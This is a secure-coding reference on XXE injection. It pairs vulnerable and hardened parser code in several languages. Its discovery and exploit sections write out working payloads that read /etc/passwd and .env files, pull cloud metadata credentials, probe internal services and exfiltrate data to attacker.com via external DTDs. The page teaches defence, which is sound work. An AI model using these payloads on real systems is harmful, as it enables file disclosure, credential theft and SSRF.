XML External Entity (XXE)

External Entity Injection

XML External Entity (XXE) at a glance

What it is: An XML parser loads and expands external entities from files or network resources, letting attackers read local files or pivot to server-side request forgery (SSRF) during parsing.

Why it happens: XXE vulnerabilities occur when applications process untrusted XML with default or unsafe parser settings, allowing external entity resolution in uploads, integrations, or document handling.

How to fix: Disable DTDs and external entities for untrusted XML, block parser network access with safe resolvers, and prefer simpler formats like JSON when possible.

Overview

XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.

sequenceDiagram
    participant Browser
    participant App as App Server
    participant XML as XML Parser
    Browser->>App: POST /upload-xml with SYSTEM entity
    App->>XML: Parse untrusted XML
    XML-->>App: Replaces &xxe; with file contents
    App-->>Browser: Sensitive data returned
    note over App,XML: Disable DTDs and entity expansion

A potential flow for an XML External Entity (XXE) exploit
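To make the expansion step concrete, here is a minimal sketch using only Python's standard library. It declares a harmless internal entity (the name `greet` and the document are made up for illustration) and shows that the parser substitutes it before the application ever sees the text. An external entity works the same way from the application's point of view, except that the replacement text comes from a `SYSTEM` URI such as a file path, which is what makes resolving parsers dangerous.

```python
import xml.etree.ElementTree as ET

# Illustrative document: the DTD declares an INTERNAL entity named "greet".
# No file or network access is involved in this demo.
DOC = b"""<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY greet "hello"> ]>
<note>&greet; world</note>"""

root = ET.fromstring(DOC)

# The application never sees "&greet;": the parser has already replaced it.
print(root.text)
```

The application code only reads `root.text`, so it has no way to tell that part of the value was injected by the DTD rather than typed into the element.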

Where it occurs

It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.

Impact

File disclosure, credential and key leakage, request forgery to internal hosts, and in rare cases code execution if the parser supports dangerous protocols such as PHP's expect:// wrapper.

Prevention

Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.
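One way to apply these rules is sketched below with Python's standard library only. It is an illustration under assumptions, not a drop-in implementation: `parse_untrusted`, `ForbiddenXML`, and the `MAX_XML_BYTES` limit are hypothetical names and values. The idea is to enforce a size limit, run a cheap expat pass that aborts on the first DOCTYPE declaration, and only then build a tree.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

MAX_XML_BYTES = 1_000_000  # hypothetical limit; tune per endpoint


class ForbiddenXML(ValueError):
    """Raised when untrusted XML is too large, malformed, or declares a DOCTYPE."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees "<!DOCTYPE"; raising aborts the parse.
    raise ForbiddenXML("DOCTYPE declarations are not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document with a DTD."""
    if len(data) > MAX_XML_BYTES:
        raise ForbiddenXML("document exceeds size limit")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    try:
        checker.Parse(data, True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc

    # No DOCTYPE means no entity declarations, so a plain parse is enough here.
    return ET.fromstring(data)
```

Calling `parse_untrusted(b"<invoice><id>42</id></invoice>")` returns the root element, while any payload that starts with a `<!DOCTYPE ...>` block raises `ForbiddenXML` before an entity can be declared. A time limit is not shown; that usually belongs at the request or worker level.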

Examples


DOM parser resolves external entities and allows file exfiltration

Default parser loads external entities from file or network.

Vulnerable

Java • JAXP DOMParser — Bad

DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());

Line 2: No features disabled, DTD and external entities may resolve

External entity references let attackers read files or make server side requests during parsing.

Secure

Java • JAXP DOMParser — Good

DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally use a secure resolver that rejects all external entities
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());

Line 2: Disable DTD and both external entity features, set a rejecting EntityResolver

Disable DTDs and entity expansion entirely for untrusted XML.

XmlDocument with default resolver processes external entities

Leaving XmlResolver set allows file and network access during parse.

Vulnerable

C# • ASP.NET Core — Bad

var doc = new XmlDocument();
// BUG: default resolver enabled on some targets
using var s = req.Body;
doc.Load(s);

Line 2: No explicit resolver nulling or DTD prohibition

External entities can read files or send network requests during XML parse.

Secure

C# • ASP.NET Core — Good

var doc = new XmlDocument { XmlResolver = null }; // block external resolves
doc.Load(reader: XmlReader.Create(req.Body, new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
}));

Line 1: Disable DTD and resolvers via XmlReaderSettings and XmlDocument

Prohibit DTD processing and set XmlResolver to null.

lxml.etree parses external entities unless disabled

Unsafe parser can read files or perform SSRF through external entities.

Vulnerable

Python • Flask + lxml — Bad

from lxml import etree
@app.post('/convert')
def convert():
    xml = request.data
    root = etree.fromstring(xml)  # BUG: no resolver or DTD disallow
    return etree.tostring(root)

Line 5: Default parser settings may resolve external entities, which can expose local files

Entity expansion leaks local files and reaches internal services.

Secure

Python • Flask + lxml — Good

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
@app.post('/convert')
def convert():
    root = etree.fromstring(request.data, parser=parser)
    return etree.tostring(root)

Line 2: Disable entity resolution and network access explicitly

Turn off entity resolution and DTDs, and block network access in the parser.

DOMDocument with external entity loading leaks files

Default options may allow network or file access during parse.

Vulnerable

PHP • DOMDocument — Bad

<?php
$dom = new DOMDocument();
// BUG: DTD and external entity load allowed
$dom->loadXML($input);
echo $dom->textContent;

Line 4: Parses user XML without disabling external entities

External entities can pull local files or remote resources into the parse result.

Secure

PHP • DOMDocument — Good

<?php
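$dom = new DOMDocument();
$dom->resolveExternals = false;
$dom->substituteEntities = false;
// PHP < 8.0 only: the function is deprecated since 8.0, where libxml >= 2.9
// already keeps external entity loading off by default
$prev = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
// LIBXML_NONET blocks network access. Never pass LIBXML_NOENT (it turns entity
// substitution ON) or LIBXML_DTDLOAD for untrusted input.
$dom->loadXML($input, LIBXML_NONET);
if ($prev !== null) {
    libxml_disable_entity_loader($prev);
}
echo htmlspecialchars($dom->textContent, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

Line 10: Forbid network access and pass neither LIBXML_NOENT nor LIBXML_DTDLOAD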

Disable entity loading and DTDs, and prevent network access during parsing.

Nokogiri parses external entities unless turned off

If network loading is enabled, entities can reach file or HTTP.

Vulnerable

Ruby • Nokogiri — Bad

class FeedsController < ApplicationController
  def create
    xml = params[:xml]
    doc = Nokogiri::XML(xml) # BUG: no nonet or noent restrictions
    render plain: doc.text
  end
end

Line 4: Parses XML without explicitly restricting network access or entity substitution

External entity expansion can read local files or cause SSRF.

Secure

Ruby • Nokogiri — Good

doc = Nokogiri::XML(params[:xml]) do |config|
  config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
end
render plain: doc.text

Line 1: Use NONET and strict parsing to block network and DTD fetches

Disable network access and DTDs for untrusted XML.

libxmljs parses external entities when not configured safely

Bindings to libxml2 can expand external entities by default.

Vulnerable

JavaScript • libxmljs — Bad

const libxml = require('libxmljs');
app.post('/xml2json', (req,res)=>{
  const xml = req.body.toString();
  const doc = libxml.parseXml(xml); // BUG: no hardening
  res.send(doc.root().text());
});

Line 4: Parsing without disabling DTD and external entity features

External entities can read files and fetch URLs during parse.

Secure

JavaScript • libxmljs — Good

const parseOpts = { noent: false, dtdload: false, dtdattr: false, noerror: true, nowarning: true, nonet: true };
const doc = libxml.parseXml(xml, parseOpts);
res.send(doc.root().text());

Line 1: Disables DTD loading and network access, keeps entity expansion off

Use parser flags to disable DTDs, entity expansion, and network.

Engineer Checklist

Disallow doctype declarations in untrusted XML
Disable external entity resolution and set a safe resolver
Disable parser network access and set time and size limits
Prefer JSON or simple formats for untrusted data paths
Add tests that submit external entity payloads and expect rejection
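The last checklist item can be sketched as a small regression test. Everything here is an assumption for illustration: `parse_invoice` is a stand-in for whatever entry point your application exposes, the payload names are made up, and the loopback URLs replace real attacker hosts so the test never reaches the network.

```python
import unittest
from xml.parsers import expat

# Payloads modeled on common XXE probes: file read, HTTP callback, parameter entity.
XXE_PAYLOADS = {
    "file_entity": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE t [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'
        b"<invoice><id>&xxe;</id></invoice>"
    ),
    "http_entity": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE t [ <!ENTITY xxe SYSTEM "http://127.0.0.1:9/xxe-callback"> ]>'
        b"<invoice><id>&xxe;</id></invoice>"
    ),
    "parameter_entity": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE t [ <!ENTITY % dtd SYSTEM "http://127.0.0.1:9/evil.dtd"> %dtd; ]>'
        b"<data/>"
    ),
}


def parse_invoice(data: bytes) -> None:
    """Hypothetical code under test; swap in the real parsing entry point."""
    parser = expat.ParserCreate()

    def forbid_doctype(*_args):
        raise ValueError("DOCTYPE not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.Parse(data, True)


class XxeRegressionTest(unittest.TestCase):
    def test_payloads_are_rejected(self):
        for name, payload in XXE_PAYLOADS.items():
            with self.subTest(payload=name):
                with self.assertRaises(ValueError):
                    parse_invoice(payload)

    def test_plain_document_is_accepted(self):
        # Hardening must not break ordinary documents.
        parse_invoice(b"<invoice><id>42</id></invoice>")
```

Saved as a test module, this runs with `python -m unittest`. Keeping the payloads in one dictionary makes it easy to add new variants when a scanner or pentest reports one.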

End-to-End Example

An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.

Vulnerable

JAVA

// Java/Spring Boot - Vulnerable to XXE

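import java.io.InputStream;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;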

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    // VULNERABLE: Using default DocumentBuilderFactory settings
    // Does NOT disable external entities or DTDs
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // DANGEROUS: These security features are NOT set!
    // factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // VULNERABLE: Parses untrusted XML with external entities enabled
    // Attacker sends:
    // <?xml version="1.0"?>
    // <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    // <invoice><id>&xxe;</id></invoice>
    Document doc = builder.parse(xmlInput);
    
    // Extract and return data (includes expanded external entities!)
    NodeList nodes = doc.getElementsByTagName("id");
    String invoiceId = nodes.item(0).getTextContent();
    
    return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}

# Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # VULNERABLE: Default lxml parser allows external entities
    # Attacker sends:
    # <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    # <root><data>&xxe;</data></root>
    parser = etree.XMLParser()  # No resolve_entities=False!
    tree = etree.fromstring(xml_data, parser)
    
    result = tree.find('.//data').text
    return {'data': result}

Secure

JAVA

// Java/Spring Boot - SECURE against XXE

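import java.io.InputStream;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;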

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // SECURE: Disable DTDs completely
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // SECURE: Disable external entities
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    // SECURE: Disable external DTDs
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    
    // SECURE: Disable XInclude processing
    factory.setXIncludeAware(false);
    
    // SECURE: Disable entity expansion
    factory.setExpandEntityReferences(false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // Set entity resolver that returns empty content
    builder.setEntityResolver((publicId, systemId) -> {
        // Return empty input source for any external entity
        return new InputSource(new java.io.StringReader(""));
    });
    
    try {
        Document doc = builder.parse(xmlInput);
        
        NodeList nodes = doc.getElementsByTagName("id");
        String invoiceId = nodes.item(0).getTextContent();
        
        return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
    } catch (SAXException e) {
        // Will throw exception if DOCTYPE is found
        return ResponseEntity.badRequest()
            .body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
    }
}

# Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # SECURE: Disable entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,  # Don't resolve external entities
        no_network=True,         # Disable network access
        dtd_validation=False,    # Don't validate DTDs
        load_dtd=False          # Don't load DTDs
    )
    
    try:
        tree = etree.fromstring(xml_data, parser)
        
        # Reject any document that declares a DOCTYPE
        if tree.getroottree().docinfo.doctype:
            return {'error': 'DOCTYPE not allowed'}, 400

        # findtext returns None instead of raising when <data> is missing
        result = tree.findtext('.//data')
        return {'data': result}
    except etree.XMLSyntaxError:
        return {'error': 'Invalid XML'}, 400

# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
    # SECURE: Use JSON instead of XML to avoid XXE entirely
    data = request.get_json()
    invoice_id = data.get('id')
    return {'invoiceId': invoice_id}

Discovery

This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.

1. Test basic external entity

http

Action

Submit XML with simple SYSTEM entity to test if external entities are processed

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n<invoice><id>&xxe;</id></invoice>"

Response

Status: 200

Body:

{
  "invoice_id": "prod-server-01\n",
  "message": "Invoice processed",
  "note": "Server hostname from /etc/hostname appears in response - XXE confirmed"
}

Artifacts

xxe_confirmed entity_processing_enabled file_disclosure

2. Probe for sensitive file disclosure

http

Action

Test file:// protocol access to read /etc/passwd

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n<data><content>&xxe;</content></data>"

Response

Status: 200

Body:

{
  "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash",
  "note": "Complete /etc/passwd file disclosed via XXE"
}

Artifacts

passwd_file_disclosed system_users_enumerated file_access_confirmed

3. Test outbound HTTP via SSRF

http

Action

Verify parser can make HTTP requests to external/internal hosts

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://attacker.com/xxe-callback\"> ]>\n<data><test>&xxe;</test></data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)"
}

Artifacts

ssrf_confirmed outbound_http_allowed xxe_ssrf_vector

4. Test parameter entity for blind XXE

http

Action

Use parameter entities to exfiltrate data via external DTD

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"file:///app/.env\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n]>\n<data>&send;</data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..."
}

Artifacts

blind_xxe_confirmed data_exfiltration parameter_entity_processing

Exploit steps

An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.

1. Extract application secrets

Read .env file containing database credentials and API keys

http

Action

Use XXE to access application configuration files

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///app/.env\"> ]>\n<invoice><notes>&xxe;</notes></invoice>"

Response

Status: 200

Body:

{
  "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0",
  "note": "Complete application secrets exposed via XXE file disclosure"
}

Artifacts

database_credentials aws_credentials stripe_api_key jwt_secret redis_connection

2. Access cloud metadata service via SSRF

Exploit XXE to query AWS EC2 metadata for IAM credentials

http

Action

Use XXE as SSRF vector to access cloud provider metadata

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role\"> ]>\n<data><creds>&xxe;</creds></data>"

Response

Status: 200

Body:

{
  "creds": "{\n  \"Code\": \"Success\",\n  \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n  \"Type\": \"AWS-HMAC\",\n  \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n  \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n  \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n  \"Expiration\": \"2024-01-15T16:23:45Z\"\n}",
  "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed"
}

Artifacts

iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials

3. Exfiltrate via blind XXE

Use out-of-band XXE to exfiltrate sensitive files

http

Action

Leverage parameter entities to send file contents to attacker server

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=/app/config/database.yml\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n%send;\n]>\n<data></data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...",
  "decoded": "production:\\n  adapter: postgresql\\n  host: db.internal.example.com\\n  database: production\\n  username: admin\\n  password: Pr0dP@ssw0rd2024",
  "note": "Database configuration exfiltrated via blind XXE to attacker server"
}

Artifacts

blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel

4. Enumerate internal network services

Use XXE SSRF to scan internal network and identify services

http

Action

Probe internal IP ranges to map network topology

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://10.0.0.5:6379/\"> ]>\n<data><service>&xxe;</service></data>"

Response

Status: 200

Body:

{
  "service": "-ERR wrong number of arguments for 'get' command\\r\\n",
  "note": "Redis server response at 10.0.0.5:6379 - internal service discovered",
  "additional_findings": {
    "10.0.0.3:5432": "PostgreSQL database server",
    "10.0.0.8:9200": "Elasticsearch cluster",
    "10.0.0.12:27017": "MongoDB instance",
    "10.0.1.50:8080": "Internal admin panel"
  }
}

Artifacts

internal_network_map service_discovery redis_server_found attack_surface_expanded

Specific Impact

Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.

Attackers may chain this with SSRF to query internal HTTP-based services, leading to data theft or unauthorized actions against those services.

Fix

Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.
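As a rough illustration of the resolver part of this fix, the sketch below uses Python's standard `xml.sax` module. It turns off external general and parameter entities and also installs a resolver that hands back an empty byte stream, so nothing is fetched even if the feature is switched on later by mistake. The names `EmptyResolver`, `TextCollector`, and `extract_text` are hypothetical, and the behavior shown assumes Python 3.7.1 or newer with the default expat-based SAX reader.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    EntityResolver,
    feature_external_ges,
    feature_external_pes,
)
from xml.sax.xmlreader import InputSource


class EmptyResolver(EntityResolver):
    """Answer every external entity lookup with empty content."""

    def resolveEntity(self, publicId, systemId):
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b""))  # never opens the file or URL
        return source


class TextCollector(ContentHandler):
    """Accumulate character data so the caller can inspect the parsed text."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def extract_text(data: bytes) -> str:
    parser = xml.sax.make_parser()
    # Explicitly disable external general and parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    # Defense in depth: only consulted if external entities get re-enabled.
    parser.setEntityResolver(EmptyResolver())
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return "".join(handler.chunks)
```

This variant tolerates a DOCTYPE but drops external references silently. If the endpoint has no need for DTDs at all, rejecting the document outright is the stricter option.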
